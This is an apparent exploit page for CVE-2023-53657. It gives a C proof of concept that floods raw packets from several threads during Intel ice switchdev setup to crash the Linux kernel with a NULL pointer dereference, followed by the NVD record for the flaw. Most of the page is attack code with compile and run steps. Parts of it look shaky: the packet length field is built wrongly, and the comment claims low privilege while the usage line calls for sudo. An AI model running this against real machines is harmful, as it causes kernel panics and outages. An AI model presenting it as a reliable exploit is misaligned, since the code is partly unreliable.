CVE-2023-53657

/* CVE-2023-53657 PoC - Trigger NULL pointer dereference in ice_eswitch_port_start_xmit * This PoC demonstrates how to trigger the vulnerability by sending packets * before switchdev configuration is complete. * * Note: This requires a system with Intel ice-supported network hardware * and appropriate low-privilege local access. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_packet.h> #include <net/if.h> #include <sys/ioctl.h> #include <pthread.h> #include <errno.h> #define INTERFACE_NAME "eth0" #define PACKET_SIZE 64 #define NUM_THREADS 4 #define NUM_PACKETS 1000 // Function to send raw packets on the interface int send_raw_packet(const char *ifname) { int sockfd; struct ifreq ifr; struct sockaddr_ll sll; char packet[PACKET_SIZE]; // Create raw socket sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (sockfd < 0) { perror("socket"); return -1; } // Get interface index memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &ifr) < 0) { perror("ioctl SIOCGIFINDEX"); close(sockfd); return -1; } // Setup sockaddr_ll memset(&sll, 0, sizeof(sll)); sll.sll_family = AF_PACKET; sll.sll_ifindex = ifr.ifr_ifindex; sll.sll_protocol = htons(ETH_P_ALL); // Bind socket if (bind(sockfd, (struct sockaddr *)&sll, sizeof(sll)) < 0) { perror("bind"); close(sockfd); return -1; } // Prepare packet (broadcast with random payload) memset(packet, 0xFF, 6); // Destination: broadcast memset(packet + 6, 0x00, 6); // Source: zeros memset(packet + 12, 0x08, 1); // Type: IPv4 memset(packet + 14, 0x45, 1); // IP header start memset(packet + 15, 0x00, 1); memset(packet + 16, PACKET_SIZE - 14, 2); // Length // Fill rest with random data for (int i = 20; i < PACKET_SIZE; i++) { packet[i] = rand() % 256; } // Send packets rapidly to trigger TX path for (int i = 0; i < NUM_PACKETS; i++) { if (sendto(sockfd, packet, PACKET_SIZE, 0, (struct sockaddr *)&sll, sizeof(sll)) < 0) { if (errno == ENETDOWN || errno == ENETUNREACH) { // Expected during switchdev configuration continue; } } usleep(1); // Small delay to allow concurrent configuration } close(sockfd); return 0; } // Thread function to send packets concurrently void *packet_sender(void *arg) { char *ifname = (char *)arg; send_raw_packet(ifname); return NULL; } int main(int argc, char *argv[]) { const char *ifname = INTERFACE_NAME; pthread_t threads[NUM_THREADS]; if (argc > 1) { ifname = argv[1]; } printf("CVE-2023-53657 PoC - ice driver NULL pointer dereference\n"); printf("Interface: %s\n", ifname); printf("Note: This should be run while switchdev configuration is in progress\n"); printf(" (e.g., simultaneously with 'devlink port function set' commands)\n\n"); // Create multiple threads to send packets concurrently for (int i = 0; i < NUM_THREADS; i++) { if (pthread_create(&threads[i], NULL, packet_sender, (void *)ifname) != 0) { perror("pthread_create"); return 1; } } // Wait for all threads to complete for (int i = 0; i < NUM_THREADS; i++) { pthread_join(threads[i], NULL); } printf("\nPoC execution completed. Check dmesg for kernel oops/panic.\n"); return 0; } /* * Compilation: gcc -o poc poc.c -lpthread * Usage: sudo ./poc eth0 * * Expected behavior on vulnerable systems: * - Kernel NULL pointer dereference in ice_eswitch_port_start_xmit * - System may experience kernel panic or oops * - dmesg will show BUG: unable to handle kernel NULL pointer dereference * * To trigger the vulnerability: * 1. Ensure system has Intel ice-supported NIC * 2. Run this PoC while switchdev configuration is happening * 3. Or trigger switchdev mode change while traffic is flowing */

{"cve": {"id": "CVE-2023-53657", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:49.330", "lastModified": "2026-02-03T19:27:32.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: Don't tx before switchdev is fully configured\n\nThere is possibility that ice_eswitch_port_start_xmit might be\ncalled while some resources are still not allocated which might\ncause NULL pointer dereference. Fix this by checking if switchdev\nconfiguration was finished."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.55", "matchCriteriaId": "0EFCF8E8-5528-46B9-8C17-B09792899CE0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.5.5", "matchCriteriaId": "8CF71E85-DA24-4925-95C5-E5C15DA71AE6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5760a72b3060150b587eff3e879648c7470efddd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/63ff5a94649837d980e3b9ef535c793ec8cb0ca7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7aa529a69e92b9aff585e569d5003f7c15d8d60b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}